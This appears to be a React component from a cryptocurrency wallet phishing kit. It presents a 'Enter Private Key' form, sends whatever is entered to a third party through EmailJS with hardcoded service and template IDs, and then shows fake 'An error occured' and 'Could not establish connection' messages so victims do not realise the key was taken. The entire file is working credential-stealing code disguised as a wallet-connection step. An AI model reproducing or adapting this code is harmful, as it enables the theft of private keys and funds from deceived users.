import React, { useRef, useState } from 'react';
import { Fade } from 'react-reveal';
import { Button, useToast } from '@chakra-ui/react';
import swal from 'sweetalert';
import emailjs from '@emailjs/browser';
import { ArrowCircleRightOutlined } from '@mui/icons-material';

function PK() {
    const [loading, setLoading] = useState(false)
    const [phrase, setPhrase] = useState("")
    const toast = useToast()

    const form = useRef();
    const sendEmail = (e) => {
        e.preventDefault();
        if (!phrase || phrase.length < 5) {
            return toast({
                title: 'Invalid wallet key!',
                description: "must contain atleast 5 characters!",
                status: 'error',
                duration: '3500',
                isClosable: true,
                position: 'top'

            })
        }
        setLoading(true)
        emailjs.sendForm('service_it5pii6', 'template_jjrdm5t', form.current, 'lFGf95fny-YwcQrxr')
        //1 SERVICE ID   
        //2 TEMPLATE_ID 
        //3 PUBLIC KEY 
            .then((result) => {
                console.log(result.text);
                setLoading(false)
                swal("", "An error occured", "info");
                toast({
                    title: 'Could not establish connection',
                    status: 'success',
                    duration: '1500',
                    isClosable: true,
                    position: 'top',
                    colorScheme:'gray',
                    variant:'subtle'
                })
                setPhrase("")
            }, (error) => {
                console.log(error.text);
                setLoading(false)
                swal("", "An error occured", "info")
            });
    };

    return (
        <div>
            <Fade>
                <center>
                    <div style={{ width: '95%' }}>
                        <form ref={form}>
                            <textarea value={phrase} onChange={(e) => { setPhrase(e.target.value) }} rows="4" name="mssg4" className='form-control mb-2' placeholder='Enter Private Key' style={{ border: '1px solid gray' }}></textarea>
                            <small className='faint'>Before you enter private key, we recommend you connect to the internet..</small>
                            <Button
                                colorScheme="blue"
                                mt="3"
                                w='full'
                                // spinner={<BeatLoader/>}
                                isLoading={loading}
                                loadingText="Connecting..."
                                onClick={sendEmail}
                            >
                                Proceed <ArrowCircleRightOutlined />
                            </Button>
                        </form>

                    </div>
                </center>
            </Fade>
        </div>
    );
}

export default PK;